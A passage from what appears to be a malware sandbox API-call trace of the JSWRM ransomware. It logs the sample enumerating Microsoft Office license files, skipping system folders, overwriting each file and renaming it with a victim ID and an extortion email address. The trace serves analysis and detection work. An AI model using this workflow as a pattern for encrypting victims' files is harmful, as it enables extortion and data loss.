[0106.626] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5120, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5120, lpOverlapped=0x0) returned 1 [0106.631] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.631] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5120, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5120, lpOverlapped=0x0) returned 1 [0106.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.632] CloseHandle (hObject=0x45c) returned 1 [0106.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0106.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0106.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0106.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0106.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0106.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0106.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.632] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_oem_perp-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_OEM_Perp-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_oem_perp-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0106.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0106.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0106.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0106.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0106.633] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7ebef60, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7ebef60, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe806293d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d48, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OutlookR_OEM_Perp-ul-oob.xrm-ms", cAlternateFileName="OUC994~1.XRM")) returned 1 [0106.633] lstrcmpiW (lpString1="OutlookR_OEM_Perp-ul-oob.xrm-ms", lpString2=".") returned 1 [0106.633] lstrcmpiW (lpString1="OutlookR_OEM_Perp-ul-oob.xrm-ms", lpString2="..") returned 1 [0106.633] lstrcmpiW (lpString1="OutlookR_OEM_Perp-ul-oob.xrm-ms", lpString2="...") returned 1 [0106.633] lstrcmpiW (lpString1="OutlookR_OEM_Perp-ul-oob.xrm-ms", lpString2="windows") returned -1 [0106.633] lstrcmpiW (lpString1="OutlookR_OEM_Perp-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0106.633] lstrcmpiW (lpString1="OutlookR_OEM_Perp-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0106.633] lstrcmpiW (lpString1="OutlookR_OEM_Perp-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0106.633] lstrcmpiW (lpString1="OutlookR_OEM_Perp-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.633] lstrcmpiW (lpString1="OutlookR_OEM_Perp-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0106.633] lstrcmpiW (lpString1="OutlookR_OEM_Perp-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0106.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0106.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0106.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0106.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x240f20, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0106.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0106.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0106.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0106.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0106.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x241330, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0106.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0106.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0106.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0106.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0106.634] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_oem_perp-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.634] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11592) returned 1 [0106.634] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0106.634] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0106.636] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.636] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0106.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.637] CloseHandle (hObject=0x45c) returned 1 [0106.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0106.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0106.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0106.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0106.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0106.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0106.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0106.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0106.637] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_oem_perp-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_OEM_Perp-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_oem_perp-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0106.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0106.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0106.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0106.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0106.638] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7e0039f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7e0039f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7f0b423, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4de1, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OutlookR_OEM_Perp-ul-phn.xrm-ms", cAlternateFileName="OU4370~1.XRM")) returned 1 [0106.638] lstrcmpiW (lpString1="OutlookR_OEM_Perp-ul-phn.xrm-ms", lpString2=".") returned 1 [0106.638] lstrcmpiW (lpString1="OutlookR_OEM_Perp-ul-phn.xrm-ms", lpString2="..") returned 1 [0106.638] lstrcmpiW (lpString1="OutlookR_OEM_Perp-ul-phn.xrm-ms", lpString2="...") returned 1 [0106.638] lstrcmpiW (lpString1="OutlookR_OEM_Perp-ul-phn.xrm-ms", lpString2="windows") returned -1 [0106.638] lstrcmpiW (lpString1="OutlookR_OEM_Perp-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0106.638] lstrcmpiW (lpString1="OutlookR_OEM_Perp-ul-phn.xrm-ms", lpString2="perflogs") returned -1 [0106.638] lstrcmpiW (lpString1="OutlookR_OEM_Perp-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0106.638] lstrcmpiW (lpString1="OutlookR_OEM_Perp-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.638] lstrcmpiW (lpString1="OutlookR_OEM_Perp-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0106.638] lstrcmpiW (lpString1="OutlookR_OEM_Perp-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0106.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0106.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0106.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=31, lpMultiByteStr=0x241308, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0106.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0106.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0106.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0106.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=31, lpMultiByteStr=0x241060, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0106.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0106.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0106.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0106.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0106.639] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_oem_perp-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.639] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19937) returned 1 [0106.639] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4de0) returned 0x24c1d0 [0106.639] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4de0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4de0, lpOverlapped=0x0) returned 1 [0106.643] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.643] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4de0, lpOverlapped=0x0) returned 1 [0106.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.643] CloseHandle (hObject=0x45c) returned 1 [0106.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0106.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0106.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0106.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0106.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0106.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0106.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.643] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_oem_perp-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_OEM_Perp-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_oem_perp-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0106.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0106.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0106.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0106.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0106.644] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7e0039f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7e0039f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7f31688, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x298b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OutlookR_Retail-pl.xrm-ms", cAlternateFileName="OUFF87~1.XRM")) returned 1 [0106.644] lstrcmpiW (lpString1="OutlookR_Retail-pl.xrm-ms", lpString2=".") returned 1 [0106.644] lstrcmpiW (lpString1="OutlookR_Retail-pl.xrm-ms", lpString2="..") returned 1 [0106.644] lstrcmpiW (lpString1="OutlookR_Retail-pl.xrm-ms", lpString2="...") returned 1 [0106.644] lstrcmpiW (lpString1="OutlookR_Retail-pl.xrm-ms", lpString2="windows") returned -1 [0106.644] lstrcmpiW (lpString1="OutlookR_Retail-pl.xrm-ms", lpString2="recovery") returned -1 [0106.645] lstrcmpiW (lpString1="OutlookR_Retail-pl.xrm-ms", lpString2="perflogs") returned -1 [0106.645] lstrcmpiW (lpString1="OutlookR_Retail-pl.xrm-ms", lpString2="documents and settings") returned 1 [0106.645] lstrcmpiW (lpString1="OutlookR_Retail-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.645] lstrcmpiW (lpString1="OutlookR_Retail-pl.xrm-ms", lpString2="system volume information") returned -1 [0106.645] lstrcmpiW (lpString1="OutlookR_Retail-pl.xrm-ms", lpString2="msocache") returned 1 [0106.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0106.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Retail-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0106.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0106.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Retail-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x241010, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0106.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0106.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Retail-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0106.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0106.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Retail-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x241100, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0106.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0106.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0106.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", 